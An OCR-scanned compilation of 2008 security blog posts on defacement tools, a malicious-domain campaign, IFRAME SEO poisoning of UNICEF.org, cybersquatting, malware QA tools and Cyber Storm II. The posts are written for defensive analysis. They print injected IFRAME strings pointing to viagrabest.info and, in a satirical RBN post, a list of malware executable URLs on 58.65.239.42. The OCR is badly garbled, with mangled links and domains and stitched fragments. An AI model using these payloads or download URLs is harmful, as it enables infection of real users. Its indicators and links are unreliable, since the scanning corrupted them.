Choose Attack Method List Of site That Hacked , Click To Open Site in Browser For Check 


() Manual Mode 
© Automatic Mode 


Get Site List 


Clear Site List To Start New Project = 
Other Tools U Need | U Can Get a Connect Back And Try To Root Access 
Get Connect back Zone-h Reporter Save Defaced List 


On the look for creative approaches to cash out of selling commodity tools and services, ma- 
licious parties within the underground economy continue applying basic market approaches 
to further commercialize what was once a tax free area. [1]Commercial click fraud tools, 
[2]managed spamming services and [3]fast-fluxing on demand, [4]botnets and DDoS attacks 
as [5]a service, [6]malware pitched as a remote access tool with limited functionality to 
prompt the user to buy the full version, malware crypting as a service, and the very latest 
indication for this trend is the availability of commercial [7]web site defacement tools. 


There’s a common misunderstanding regarding web site defacement tools, namely that of 
a defacer on purposely targeting a specific domain. That’s at least the way it used to be, 
before defacers started embracing the efficiency model, namely deface anyone, anywhere, 
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spanishp@hotmail.com 
susanneon@googlemail.com 
tank@incomeet.com 
theklutch@gmail.com 
um@jabbim.com 

virus e@ 2003@hotmail.com 
vlad.dimitrov@hotmail.com 
Sample domains known to have been involved in the campaign: 
uniterace.com 
update-kb18628311.com 
vendettamenolkreamste.com 
vensart.net 

soucker.com 
contactrnyprivateregistration.com 
strbrst.net 

bc-server.com 
xldavinchireverce.com 
xlreservation.com 
revstabl77gmail.com 
xtrace-upgrade.com 
xxmagicreservation.com 
xxxmagicreservation.com 
ytjsxkupugwfjpp.com 
inxrhe.com 
zlegalsource.com 
borrownetpowerlimited.com 
fasterrnail.ru 
adminmacro-store.com 
keevegolyn.com 
talettedible.com 
thescarts.name 
tokiocitus.com 

peru.com 

tongomario.com 


topsecurityplace.com 
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totalexcel.net 
wwwapps-ups.net 
sdfdsgfdf126.com 
tradingcenter.cc 
cinipac.com 
trigaproholds.com 
triplexguard.com 
tscounter.com 
tuk-tuk.com 
twoplussoft.com 
ufkirankmega.net 
free-id.ru 
ultragatewealth.com 
ultrareservation.com 
systrmp.com 
westcuternaii.org 
sfimnakedgirls.com 
rnaiiti.com 
adrninshanmana.net 
sirnplychasinasis.com 
skiangpa.net 
afsrnedciagmail.com 
smartsecuritybox.com 
softsecuritylab.com 
ssl-autoris.com 
stacyeiblerki.com 
sterijncompan.com 
strongtopguard.com 
sunageoshighvi.com 
svistoklex.com 
prlwppsunenofsx.com 
ptsoncmrusnjoew.com 
guardsecurity.com 
guiverharbor.com 
guivertiprocketmaii.com 
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22245678.com 
mordehaiguryahoo.com 
revercestable.com 
rewriterform.com 
sampinv.name 
scarts.name 
sdfokoiasedewg.com 
securitydaemon.com 
domain.techyahoo-inc.com 
seeikom.name 
sellertop.cn.com 
photalegraza.comprivacy.above.com 
polovinkajfie.com 
poogatodf.com 
windcutemail.org 
portmeadowcapital.com 
portmeadowcapital.comdomainsbyproxy.co 
pospayinstruczione.com 
posta-myposta.com 
poste-sedyre.com 
viimans.com 
vipworldhost.com 
vzrnb404.com 
westemillusion.com 
westili5Ogmail.com 
whyvavilon.com 
whyvavflon.com 
widowadvertising.net 
wopedjhfitzfgh.com 
wopedjhfhtzfgh.com 
moigerta.cn.com 
mspselling.com 
raingroup.com 
myscarts.name 


mywatchresource.com 
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nachauserinfo.com 
nachauser-storeinfo.com 
nakostelidze.net 
national-security-agency.com 
neironhounder.com 
neoprenolen.com 
newturbobrowser.com 
registerapi.com 
iomertomcomnet.com 
stingomauroyahoo.com 
nookbizkitsad.com 
nsdnsrv.com 
nsonchecks2.com 
msn.com 
objectsphereuf.com 
graspyourisp.ru 
oblomidze.net 
oposumschoone.com 
ogkplss.com 

wir3s.com 
padesionittatu.com 
isoneterts.com 
ture.com 

kIrtm.com 
layeradv.com 
ievel-upgrage.com 
mail.com 
iilaussieprems.com 
iiviarylink.com 
iocaldarcenss.com 
lorevingbranta.com 
Iprshcsmijfovp.com 
1337853contact.gandi.net 
lucascattientop.com 


m5ta2bg-server.net 
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managenetwor.com 
manageopoly.com 
marsplus.com 
maymacngocphuong.com 
988gmail.com 
mcgoth.com 
meazeridashloc.com 
https04.com 
michigan4movies.com 
newdomainssiteground.com 
microbase-update.com 
microsoft-update.name 
hoffmnarketraph.com 
hosthgk.net 
adminhosthgk.net 
hunterdriveez.com 
hv673hv573hv53h7khv57.com 
2.com 

bk.ru 

incode.name 
indigocrickets.com 
investriotinto.com 
iserverupdates.com 
1.com 

jdjsaf34.com 
adminjdjsaf34.com 
jinanpharmaceutical.com 
registryoderland.se 
jockesnotliked.com 
johngottybest.com 
josunrwpyghvttr.com 
junioroops.name 
hotmaii.com 
gedpoil.com 


giftcanbuy.com 
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cutemail.org 
greatrotewallen.com 
grz942.com 
guppobod.net 
headtickets.com 
gogomailit.com 
hhtres.com 
highnetlifelentrasx.com 
highnetiifelentrasx.com 
highnetlifenet.com 
high-privacy.com 
high-update.com 
high-upgrade.com 
driveplex.net 
drontapesoff.com 
whoisprotectservice.net 
dst-finance.com 
dualglobalwave.com 
dualwavegmail.com 
europeconsults.com 

2.net 

famontare80.net 
favoritopilodjd.com 
federalreserve-online.com 
federetoktyt.net 

inbox.ru 
fedralwire-report.com 
rttreswaloyahoo.com 
finewcreautomp.comprivacy.above.com 
flashbangsecurity.com 
apperhousebiackyahoo.com 
forppp.net 
forviclemo.com 
repossesseddomaingodaddy.com 


fzbox.com 
13898 


whoisguard.com 
frtualpomclub.com 
copelixell.com 
cornermarketmedia.com 
cronjelaw.com 
cuficellimaad.com 
daosf3doapo.com 
dbi-static.com 

mail.ru 
dempeighternya.com 
deressenwarpoi.com 
microsoft.com 
dogovoridze.net 
brandc.name 
domainsproxy.name 
brigatexgluc.com 
bringithomedude.com 
brnsounds.cc 
rastainfogmail.com 
bxkkuskgdjskdn.com 
cdkd.net 
exsile777gmail.com 
fastermail.ru 
clingcornem.com 
adminclingcomem.com 
closedsource.cc 
codecurveopusi.com 
bz3.ru 

036px.com 
io8cms.com 
i.cannot.do.itgmail.com 
b86a9c7.com 
Inbank.info 
nogtchamail.ru 


202ofilms.net 
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exticie.com.au 
24onlinedrug.com 
2report-nacha-org.com 
2report-nachaorg.com.whoisproxy.org 
4to4kit.com 
56pa7bo.com 
73a372rtp.com 
7435424vs.com 
5474vs.com 
7435924vs.com 
7437424vs.com 
8424vs.com 
83a372rtp.com 
888778889900.net 
930nbsdaiodsa.com 
trexmarketing.co.za 
aaakiudsnayyg.com 
aboutinsurcar.com 
accessslist.net 
adminaccesssiist.net 
ach-files-alert.com 
ach-nacha.com 
ach-reports.com 
ach-transffers-us.com 
acrefied.com 

g2.com 
administrationistsdug.com 
adventurehorde.com 
bingotalk.com 
adventureineer.com 
adventureitect.com 
adventuremechanic.com 
adventureriver.net 
adventurerocks.net 


adventureshoal.com 
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than parse the successful defacements logs, come across a high profile site and make sure the 
entire defacers community knows that they’ve defaced it - well at least their automated web 
sites defacement tools did [8]in a combination with remotely included [9]web backdoors. 


F'¥zZone-H.org Notifications For New Zone-H Se Ed 


List OF Sites That Hacked and U Want to Report it — List OF Site That Reported Successfully 


About Defacer and Deface Method List OF Failed , Before Reported in Last 6 Month 
Defacer Name 


[access credentials through Man In the Middle 7| 
[Patriatism 7| 


Load List From File | Start Reporting | Clear All On Hold | Save | OK | 


First Load List OF Site That Hacked and then Click Start Reporting 


This particular commercial web site defacement tool’s main differentiation factor compared to 
others is it’s efficiency centered functionability, namely it has a [10]built-in Zone-H defacement 
archive submission. Moreover, within the functions changelog we see : 


"Choose number of perm folder to check it and go another site with out load all perm it cause 
to deface with more speed; Working back proxy and cache servers; Get Connect back with 
php in all servers that safe mode is Off ( with out need any command same as system() ; Auto 
Detect Open Commana" 


It is such kind of commercialization approaches of commodity goods that increase the market 
valuation of the underground economy in general, one thing for sure though - while certain 
parties are messing up with entry barriers making it damn easy to launch a phishing or a mal- 
ware attack, others are trying to prove themselves as aspiring entrepreneurs. In the long-term, 
I'd rather we have defacers deface than consolidate with phishers, soammers and malware 
authors for the purpose of malware embedded attacks, hosting and sending of scams, a devel- 
opment that is slowly starting to take place despite my wishful thinking. 


Related posts: 

[11]Hacktivism Tensions 

[12]Hacktivism Tensions - Israel vs Palestine Cyberwars 
[13]Mass Defacement by Turkish Hacktivists 


[14]Overperforming Turkish Hacktivists 
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_http://adanchev blogspot .con/2007/10/nanaged- spanning-appliances~future-of tall 
_ het: //adanchev blogspot. con/2007/11/nanaged-fast-flux- provider heal 

| http: //adanchey blogspot .con/2007/10/botnet~on~denand- service. html 

| http:/ /adanchev blogspot. con/2008/08/oadsces-ddos~for-hire- service. Hial 

_ hep: //Adanchev blogspot .con/2007/12/ hark-nalare-nev-versions~coming. ntl 

| http://photost. blogger .con/blogger/1988/1779/1600/atoo1-1.0.png 


10. 
12 
13 


O©OONODUBWNE 


. http: //ddanchev.blogspot .com/2006/07/hacktivism-tensions-israel-vs.htm 
. http: //ddanchev.blogspot .com/2007/11/mass-defacement-by-turkish-hacktivists.htm 
14. http: //ddanchev.blogspot.com/2007/11/overperforming-turkish-hacktivists.htm 
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4.4.2 UNICEF Too IFRAME Injected and SEO Poisoned (2008-04-01 13:45) 


-V f 
Your search - VAGRA AMEsrc=//viagrabest.info/V/> - did not match any documents 
Suggestions:. Make sure all words are spelled correctly. .. 
wow. unicef org’... SE &spell=1 &ie=UTF-Bal=Schient= =voy&num=20&site=voy&0e=UTF-8 - 7k 


ached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - VAGRA IFRAME src=//viagrabest.info/V/ - did not match any documents 
Suggestions:. Make sure all words are spelled correctly. ... 

wew.unicef org/voy/search/search php?q=+VIAGRAHFRAME%20sre= /Aiagrabest. info/Vs - 7k 


ached - pis page 


Your search - VAGRA *yframe src=/‘viagrabest.info/V/* - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. .. 
wew.unicef org/voy/search/search. php? 2q=4+VIAGRA yirame%20erc= =/Magrabest info/Vi* - 7k 


ached - Similar page 


-V f 
You searched unicef.org/voy (English) for VAGRA src=//viagrabest.info/V/. Your search - 
VIAGRA src=//viagrabest.info/V/ - did not match any documents. ... 
wew. unicef org/voy/search/search. php?q=+VIAGRA%20src=/Magrabest info/V/ - 7k - 
ached + Sumuar ¢ ges 


N - Voi f h 
Your search - VAAGRA IFRAMEsrc=//viagrabest.info/V/ - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. ... 
wow. unicef org/voy/search/search. php?q=+VIAGRAHFRAMEsrce=/Miagrabest.info/V/ - 7k - 


Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - VAGRA __IFRAME src=//viagrabest.info/V/_ - did not match any documents 
Suggestions:. Make sure all words are spelled correctly. ... 

weew. unicef orgvoy/search/search. php?q=+VIAGRA+_ IFRAME %20src=/Magrabest info/V/_ - 
7k - Cached - Similars age 


Your search - VAGRA ME src=/Aagrabest.info/V/> - did not match any documents 
Suggestions:. Make sure all words are spelled correctly. .. 

weew.unicef GaSb eee php? 2q=+VIAGRA+%20ME%20src= =/iagrabest. infos V/%3E 
- 7k - Cached - Simitar pa 


Your search - VAGRA [no swearing please) src=/Aviagrabest.info/V/> - did not match any 
documents. Suggestions:. Make sure all words are spelled correctly. .. 

werw. unicef org/voy/search/search phg?er-VIAGRA+SEno KAD owoerng® 20 pease KEDK 
2src=/Magrabest. infoAV/G3E - 7k - Cached - Similar page 


F-¥V f f 
Your search - viagra framesrc=//viagrabest.infoW - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. ... 
werw unicef. org/voy/search/search. php?q=+wagratiframesrc=/Mmagrabest infoMW - 7k - 


Cached - Similar pages 


The very latest, and hopefully very last, high profile site to successfully participate in the re- 
cently exposed [1]massive SEO poisoning, is UNICEF’s official site. In fact the campaign is so 
successful, where successful means that each and every poisoned result loads the injected 
IFRAME using UNICEF.org as a doorway to pharmaceutical soam and scams, that one of the 
most prolific domains within the IFRAMES ( highjar.info ) is already returning " Bandwidth Limit 
Exceeded. The server is temporarily unable to service your request due 


to the site owner reaching his/her bandwidth limit. Please try again later " messages. 


This is the perfect moment to point out that as of yesterday’s afternoon the search engines 
that were indexing the SEO poisoned pages have implemented filters so that the malicious 
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pages no longer appear in their indexes, thereby undermining the critical success factor for 
this campaign - hijacking search traffic . Case closed? At least for now, and even though the 
black hat SEO is taken care of the last time | checked, some of the sites originally mentioned, 
and many others still need to take care of the web application vulnerabilities. 


unicef @ 


Voices of Youth ee 


Search results 


You searched unicef.org/voy (English) for 


Bandwidth Limit 
Exceeded 


The server is temporarily unable to service 
your request due to the site owner reaching +| 


Tracking this campaign in a detailed manner inevitably results in a quality actionable intelli- 
gence data, in between the added value out of the historical preservation of evidence. The 
malicious parties behind this know what they’re doing, they’ve been doing it in the past, and 
will continue doing it, therefore it’s extremely important to document what was going on 
at a particular moment in time. It’s all a matter of perspective, some care about the type 
of vulnerability exploited, others care who’s hosting the rogue security applications and the 
malware, others want to establish the RBN connection, and others want to know who’s behind 
this. [2]Virtual situational awareness through CYBERINT is what | care about. 


Let’s close the case by assessing UNICEF.org’s IFRAME injection state as of yesterday’s 
afternoon. What is highjar.info/error (75.127.104.26) anyway? Before it felt the "UNICEF 
effect" in terms of traffic, it used to be a " Easy SEO | A Coaching Site For BEGINNING 
webmasters ". And the last time it was active, the injected redirect was forwarding to 
ravepills.com/?TOPQUALITY (69.50.196.63) and RavePills is what looks like a "legal alternative 
to Ecstasy" : 


"On the other hand, Rave is the safest option available to you without the fear of nasty 
side-effects or a long time in jail. Rave gives you the same buzz that the illegal ones do 
but without any proven side-effects. It’s absolutely non-addictive & is legal to possess in 
every country. Rave gives you the freedom to carry it anywhere you go as it also comes in a 
mini-pack of 10 capsules. " 


IFRAMES injected within UNICEF.org : 
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highjar.info ( 75.127.104.26) 
viagrabest.info ( 81.222.139.184) 
pharmacytop.net ( 216.98.148.6) 


grabest.info 
Now that the entire campaign received the necessary attention and raised awareness 
on its impact, let’s move onto the next one(s), shall we? 


1. http: //ddanchev. blogspot .com/2008/03/massive-iframe-seo-poisoning-attack.htm 


2. http://ddanchev.blogspot .com/2006/09/cyber-intelligence-cyberint .html 


4.4.3 Cybersquatting Symantec’s Norton AntiVirus (2008-04-01 14:17) 


CYBER- 
TYPO 


SQUATTING 


For the purpose of what? Upcoming fraudulent activities, again courtesy of [1]lnteractive- 
brand’s undercover domains portfolio having registered the following domains cybersquatting 
[2]Norton AntiVirus, next to the PandaSecurity and McAfee ones | listed in a previous post : 


antivirus-norton.org 
norton-2007.org 
norton-antivirus-2007.org 


norton-virus-scan.org 
nortonsecurityscan.org 
norton-antivirus-2007.net 
norton-antivirus-2008.net 


norton2008.net 
nortonantivirus2007.net 
nortonantivirus2008.net 
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nortonsecurityscan.net 


norton-2008.com 


norton-antivirus2007.com 


norton-virus-scan.com 


nortonsecurity2008.com 
Registed and again operated by : 


Interactivebrands 

Tech City:St-Laurent 

Tech State/Province:Quebec 

Tech Postal Code:H4L4V5 

Tech Country:CA 

Tech Phone:+1.5147332556 

Tech FAX:+1.5147332533 

Tech Email:admindns @ interactivebrands.com 


Now that’s a proactive response to another upcoming scam, an here are some comments on 
[3]one of the domains. 


1. http: //ddanchev. blogspot .com/2008/03/cybersquatting-security-vendors-for.htm 
2. http: //www.symantec.com/enterprise/security_response/weblog 
3. http: //www.siteadvisor.com/sites/nortonsecurityscan.net/summary/ 
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4.4.4 HACKED BY THE RBN! (2008-04-01 22:35) 


The RBN OwnZ 7th1 $ BIOg! April 1st, 2008, St.Petersburg, Russia. The Russian Business 
Network, an internationally renowned cyber crime powerhouse is proud to present its very 
latest malware cocktail by embedding live exploit URLs within one of the top ten blogs to be 
malware embedded due to their overall negative attitude regarding the RBN’s operational 
activities. A negative attitude that’s been nailing down the RBN’s cyber coffin as early 2007, 
prompting us to hire extra personel, thereby increasing our operational costs. 


Hijacked readers of this blog, executing the harmless to a VMware backed up PC setup 
files below, will not just strengthen our relationship by having your computer contact ours, 
but will also help us pay for the infrastructure we use to host these, and let us continue 
maintaining our 99 % uptime even in times of negative attitude on a large scale against our 
business services. 


How can you too, support the RBN, just like hundreds of thousands customers whose 
computers keep on connecting to ours already did? Do the following : 


- Execute our very latest, small sized executable files and let them do their job 


58.65.239.42/jdk7dx/ inst250.exe 
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58.65.239.42/jdk7dx/ alexey.exe 
58.65.239.42/jdk7dx/ 6.exe 
58.65.239.42/jdk7dx/ 1103.exe 
58.65.239.42/jdk7dx/ eagle.exe 
58.65.239.42/jdk7dx/ krab.exe 
58.65.239.42/jdk7dx/ win32.exe 
58.65.239.42/jdk7dx/ pinch.exe 
58.65.239.42/jdk7dx/ Idig0031242.exe 
58.65.239.42/jdk7dx/ 64.exe 
58.65.239.42/jdk7dx/ system.exe 
58.65.239.42/jdk7dx/ bhos.exe 
58.65.239.42/jdk7dx/ bho.exe 


- Once you’ve executed them, make sure you initiate an E-banking transaction right way. 
Do not worry, you don’t to give us your banking details for the donation, we already have 
them, and will equally distribute your income by meeting our financial objectives 


- Now that you’re done transfering money, authenticate yourself at each every web ser- 
vice that you’ve ever been using. Trust is vital, and so that we’ve trusted you by providing you 
with our latest small sized executable files, it’s your turn to trust us when asking you to do so 


- Don’t forget to plug-in any kind of writeble removable media once you’ve executed the 
files above as well, as we’d really like to deepen our relationship by storing them, and having 
them automatically execute themselves the next time you plug-in your removable media 


- Sharing is what drives our business. Just like the way we’ve shared and trusted with 
by providing you with direct links to our executables, in exchange we know you wouldn’t mind 
sharing some of that free hard disk space you have for our own distributed hosting purposes 


Stop hating and start participating, join our botnet TODAY! Don’t forget, diamonds de- 
grade their quality, hosting services courtesy of the RBN are forever! 


Sincerely yours, 
"HostFresh" - RBN’s Hong Kong subsidiary 
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4.4.5 Quality and Assurance in Malware Attacks (2008-04-02 18:02) 


x | 
File to Scan: C:4YScan\Virus\server.exe a w Scan File 
>) <-FxStatupAVs [Check AllAVs Gj  _o” _ Result 
Ge Antivius 
[YJA-Squated —— nnnnnnennnnenneneeenceeeenennveeeeescennnemnnseeeenennnenmeenenennsente > cick 
A > chek 
VJAVG Virus Found! 
Vl Avast Virus Found! 
[V)BitDefender Virus Found! 
1) Clamiwin Virus Found! 
M)DiWeb Virus Found! 
) eTrust Virus Found! 
MIFProt Virus Found! 
V)Kaspersky 7 — Virus Found! 
[V)McAfee Virus Found! 
[)Nod32 Virus Found! 
[¥) Norman Virus Found! 
Norton No Virus Found 
(Vv) Panda Virus Found! 
[¥) QuickHeal No Virus Found 
[¥) Sophos Virus Found! 
[¥]TrendMicro Virus Found! 
[V] VBA32 Virus Found! 
Update: 


Oo <-- Update Button gz <-— Download Updates &! <-— Extracter Updates 


© Help © About 


The rise of multiple antivirus scanners and sandboxes as a web service, did not only increase 
the productivity level of researchers and utilized the wisdom of crowds concept by sharing 
the infected samples among all the participants courstesy of the crowds submitting them, it 
also logically contributed to the use of these freely available services by malware authors 
themselves. In fact, the low detection rate is often pointed out as the quality of the crypting 
service by the authors themselves while advertising their malware or crypting services. And 
when a popular piece of malware known as[1] Shark introduced a built-in VirusTotal submission 
to verify the low detecting rate of the newly generated server, something really had to change 
- like it did. 


At the beginning of 2008, VirusTotal which is among the most widely known and used 
such multiple antivirus scanner as a web service, decided to remove the "[2]Do not distribute 
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the sample" option, directly undermining the malware authors’ logical option not to share their 
malware with anti virus vendors, but continue using the service. The multiple antivirus scanner 
as a web service is such a popular model, that there’re several other such services available 
for free, with many other underground alternatives for internal Q &A purposes. But now 
that each and every possible service that comes with the malware product is starting to get 
commercialized, it is logical to question how would quality and assurance obsessed malware 
authors disintermediate the intermediary to actually break-even out of their investment in a 
malware campaign? Would they continue [3]porting malware services to the Web, or would 
they take some of their Q &A activities offline? 


In the past, there’ve been numerous underground initiatives to come up with an offline 
multiple virus scanners, and [4]here are some examples courtesy of PandaSecurity’s Xabier 
Francisco, and as you can see in the attached screenshot, development in this area is con- 
tinuing, with the following anti virus scanners included within this all-in-one offline malware 
scanner : 


"A-Squared, AntiVir, Avast; AVG Anti-Virus Free Edition, BitDefender, Clam Win, Dr.Web, 
eTrust; F-Prot, Kaspersky Antivirus 7, McAfee, Nod32; Norman, Norton, Panda, QuickHeal, 
Sophos, TrendMicro, VBA32" 


Talking about reactive security, the concept of doing this has always been there, and 
will continue to evolve despite that the most popular online multiple anti virus scanning 
services started sharing all the infected samples between the anti virus vendors themselves. 
And now that malware authors are also starting to understand what behavior-based malware 
detection is, and how a [5]host based firewall can prevent their malware from phoning back 
home, even though the host is already infected, the success rates of their malware campaigns 
is prone to improve even before they’ve launched the campaign. 


When malware authors start embracing the [6J]OODA loop concept - Observation, Orien- 
tation, Decision, Action - things can get really ugly. Why haven’t they done this yet? They 
Keep it Simple, and it seems to work just fine in terms of the ROI out of their actions. One 
thing’s for sure - malware will start getting benchmarked against each and every antivirus 
solution and firewall before the campaign gets launched, in a much more efficient and Q &A 
structured approach than it is for the time being. 


1. ftp: //ddanchev,blogapot.con/2007/06/rats-or-aalware. uta 
2, http: / olog. hispasec.con/virustotal/26 

3, hetp: / /ddanchev. blogspot .con/2007/00/aalvare-as-veb-service. bial 

4, bttp://pandalebs pandasecurity.con/archive/Multi-AVe-Scamere. aya 

5. http: / /ddanchev. blogspot. con/2007/10/mil+iple-firevals~bypassing.htal 
6. beep: //en. wikipedia. org/iki/00DA, Loop 


4.4.6 The Cyber Storm II Cyber Exercise (2008-04-03 17:29) 


Homeland CYBER STORM 


Security 


Fact Sheet 


Cyber Storm II National Cyber Exercise 


In March 2008, the Department of Homeland Security’ s National Cyber Security Division (NCSD) will 
sponsor its second large-scale national cyber exercise, Cyber Storm I. Planned in close coordination with 
and driven by its stakeholders and participants, the exercise will center on a cyber-focused scenario that 
will escalate to the level of a cyber incident requiring a coordinated Federal response. Exercises such as 
Cyber Storm I are critical in maintaining and strengthening cross-sector, inter-governmental and 
intemational relationships, enhancing processes and communications linkages, as well as ensuring 
continued improvement to cyber security procedures and processes. Cyber Storm Il is part of Homeland 
Security's ongoing risk-based management effort to use exercises to enhance goverment and private 
sector response to a cyber incklent, promote public awareness, and reduce cyber risk within all levels of 
goverment and the private sector, 
= 
As the DHS biennial National Cyber Exercise, the Scenario 


goal of Cyber Storm Il is to examine the processes, The adversary in Cyber Storm II will utilize 
procedures. tools, and organizational response to a coordinated cyber and physical attacks on cnitical 
multi-sector coontinated attack through, and an, the infrastructures within selected sectors to meet a 
global cyber infrastructure. specific political and economic agenda. These 
cyber attacks will be simulated and will not impact 
Objectives any live networks. 
© Examine the capabilities of participating 
erganizalions to prepare for, protect from, and Participants 
respond to the potential effects of cyber attacks Participation in Cyber Storm Il includes Federal, 
© Exercise strategic decision making and State, local, and intemational govemments, 
interagency coordi nation of incident response(s) including Australia, Canada, New Zealand, and the 
in accordance with national level policy and United Kingdom. In addition, private sector 
procedures players from the Information Technelogy (IT), 
¢ Validate information sharing relationships and Transportation (Rail and Pipe), and Chemical 
communications paths for the collection and sectors along with multiple Information Sharing 
dissemination of cyber incident situational and Anulysis Centers (ISACS) are scheduled to 
awareness, response, and recovery information participate. 
@ Examine means and processes through which to 
share sensitive information across boundaries and For additional information on Cyber Stonn 
sectors, without compromising proprietary or exercises, please contact Jon Noetzel at 
national security interests Jonathan, Noctzel @ associates. dhs. gov. For media 
° inquires, please contact the DHS Press Office at 


Cyber Storm I will also provide an opportunity to 202-282-8010. 


exercise newly developed govemment and private 
sector come pts and processes since Cyber Sianm I, 
such as Concepts of Operations and Standard 
Operating Procedures. 


| first blogged about the [1]"Cyber Storm" Cyber Exercise aiming to evaluate the preparedness 
for cyber attacks of several governments two years ago, and pointed out that : 


"Frontal attacks could rarely occur, as cyberterrorism by itself wouldn’t need to interact with 
the critical infrastructure, it would abuse it, use it as platform. However, building confidence 
within the departments involved is as important as making them actually communicate with 
each other." 


And while I’m still sticking to this statement, [2]a year later | also pointed out that : 


"In a nation2nation cyber warfare scenario, the country that’s relying on and empowering its 
citizens with cyber warfare or CYBERINT capabilities, will win over the country that’s dedicating 


1403 


special units for both defensive and offensive activities, something China’s that’s been copying 
attitude from the U.S military thinkers, is already envisioning." 


~ 
[www diic.com.tw ie w~~ 
sf = + 


AE oS 89 SS FR TI 
FU BEA KRW RARE See 


SRESRT-RECR 2 RHUBATSRAMS 
@ AH-64D Biock HiME pF Rectal apa hi LVR 
SS REWTIFERARARARAES 


Morever, Taiwan, too, copycating the U.S, performed a cyber warfare exercise codenamed 
"Hankuang No. 22" (Han Glory) in 2006 as well, fearing cyber warfare attacks from China. 


The new "Cyber Storm" Cyber Exercise, is particularly interesting, especially the initiative 
to measure the response time to an OPSEC violation in the form of [3]sensitive information 
leaking on blogs. A very ambitious initiative, given the many other distribution channels, 
which when combined in a timely manner make it virtually impossible to shut down and 
censor, the leaked material. What if it gets spammed? Moreover, what’s a leak to some, is 
transparency into the process for others. [4]Cyber Storm II is [5]already a fact whatsoever : 


"At a cost of roughly $6.2 million, Cyber Storm II has been nearly 18 months in the planning, 
with representatives from across the government and technology industry devising attack 
scenarios aimed at testing specific areas of weakness in their respective disaster recovery 
and response plans. ‘The exercises really are designed to push the envelope and take your 
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failover and backup plans and shred them to pieces,’ said Carl Banzhof, chief technology 
evangelist at McAfee and a cyber warrior in the 2006 exercise. Cyber Storm planners say they 
intend to throw a simulated Internet outage into this year’s exercise, but beyond that they are 
holding their war game playbooks close to the vest." 


The main issue with this type of cyber exercises is that starting with wrong assumptions un- 
dermines a great deal of the developments that would follow. Cyber warfare is just an ex- 
tension of the much broader information warfare as a concept, namely, Lawfare, Econonomic 
Warfare, PSYOPS, to ultimately end up in [6]Jan unrestricted warfare stage. Subverting the en- 
emy without fighting with him, that’s what offensive cyber warfare is all about, even if you take 
[7]people’s information warfare concept as an example. It’s a government tolerated/sponsored 
activity, whereas the government itself is suverting the enemy without fighting him, but for- 
warding the process to their collectivism minded citizens. The strong lose, since the adversary 
is abusing the most unprotected engagement point, thereby underminig the investments made 
into securing the most visible touch points. A couple of key points to consider in respect to the 
cyber exercise modelling weakness : 


- White hats pretending to be black hats simply doesn’t work 


- Frontal attack against critical infrastructure is pointless, insiders are always there to "take 
care" 


- Passive cyber warfare such as [8]gathering OSINT and conducting espionage through botnets 
- [9]Cyber warfare tensions engineering through the use of stepping stones 

- Stolen and manipulated data is more valuable than destroyed data 

- Lack of pragmatic blackhat mentality scenario building intelligence capabilities 


- Unrestricted Warfare must be first understood as a concept, than anticipated as the real threat 
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Deception 
arget 


a. Lone 
cyberterrorists 


b. Small, 
technologically 
sophisticated 
groups 


c. Same as b. 
but as a wing in 
a larger 
organization 


d. Large 
Religious 
fundamentalist 
organizations 


e. Government- 
backed or 
sponsored 
units 


f. Same as e. 
but government 
links are covert 


Leadership 


Possible: Brains 
and body are one 
and the same 


Possible: Leader 
has direct control 
of organization 


Difficult: Group 
leader different 
from organization 
leader 


Possible: Leader 
has direct control 
of organization 


Possible: Group 
leader may be 
known 


Difficult 
Hierarchy of 
leadership not 
easy to 
determine 


Cyberspace 
intelligence 


Possible: The 
Internet is likely a 
major source of 
intelligence 


Possible: The 
Internet is likely a 
major source of 
intelligence 


Possible: The 
Internet is likely a 
major source of 
intelligence 


Possible: The 
Internet is likely a 
major source of 
intelligence 


Difficult: They 
would have 
ready access to 
other intelligence 
sources 


Difficult: They 
would have 
ready access to 
other intelligence 
sources 


Security 
confidence 


Difficult: They do 
not need to trust 
others 


Difficult: Group 
cohesion 
expected to be 
tight 


Difficult: Group 
cohesion could 
be tight but it is 
not certain 


Possible: Large 
organizations 
cannot have 
complete control 
over information 
flows 


Difficult: Secrecy 
and security not 
@ fear-inducing 
issue 


Difficult: Secrecy 
and security not 
@ fear-inducing 
issue 


Communication 
networks 


Difficult: No need 
for 
communications 


Difficult: Being 
small and 
centralized 
reduces 
communication 
requirements 


Difficult: Being 
small and 
centralized 
reduces 
communication 
requirements 
Possible: Large 
dispersed 
organizations 
need frequent 
communications 
for coordination 


Possible: Large 
dispersed 
organizations 
need frequent 
communications 
for coordination 
Difficult: Need for 
additional 
secrecy would 
probably result in 
special 
communications 
means 


Table 5. Deceptions against Cyberterrorists. 


From a strategic perspective, securing and fortifying what you have control of is exactly what 
the bad guys would simply bypass in their attack process, among the first rules of unrestricted 
warfare is that there’re no rules with the idea to emphasize on the adaptation and going a step 
beyond the adversary’s defense systems in place. 


http: //ddanchev. blogspot .com/2006/09/results-of-cyber-storm-exercise.htm 
ttp://ddanchev. blogspot .com/2007/09/chinas- cyber-espionage-ambitions.htm 


http://www. El Saale som/2008/01/31 fpentagons— se storm-war-game-simulates-blogger-leaks-train/ 


1. 

2. 

3. 

4. netp://siv.sashingtonpost .con/yp-dyn/ content /aricle/2008/09/07/AR2008030701157 be 
5. http: //www.us-cert .gov/reading_room/infosheet_CyberStormII.pdf 

6. http: //Adanchev. blogspot .con/2007/12/combating-uarestricted-varfare. heal 

7, http: //Adanchev, blogepot.com/2007/10/peoples~information-warfare- concept. tal 

8. http: / /ddanchev. blogspot .con/2007/04/osint-through-botnets hel 

9, http: //Adanchev. blogspot con/2008/02/nalware- infected-hosts-as~ stepping. heal 
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4.4.7 Skype Spamming Tool in the Wild (2008-04-07 13:57) 


Name: ljonukas 


[roo m8 just testing 


Message: | Dont take it seriously, just testing : 


—se 


WE O10 NOT TAKE ANY REGPONSIGILITY ON HOW VOU WILL UGE THIG PROGAAM 


Have you ever wondered [1]what’s contributing to the rise of instant messanging spam 
([2]SPIM), and through the use of which tools is the proccess accomplished? Take this recent 
[3]proposition for a proprietary Skype Spamming Tool, and you'll get the point from a do-it- 
yourself (DIY) perspective. This proprietary tool’s main differentiation factor is its wildcast 
capability, namely searching for John will locate and send mass authorization requests to 
all usernames containing John. So basically, by implementing a simple timeout limit, mass 
authorization requests are successfully sent. The more average the username provided, the 
more contacts obtained who will get soammed with anything starting from phishing attempts 
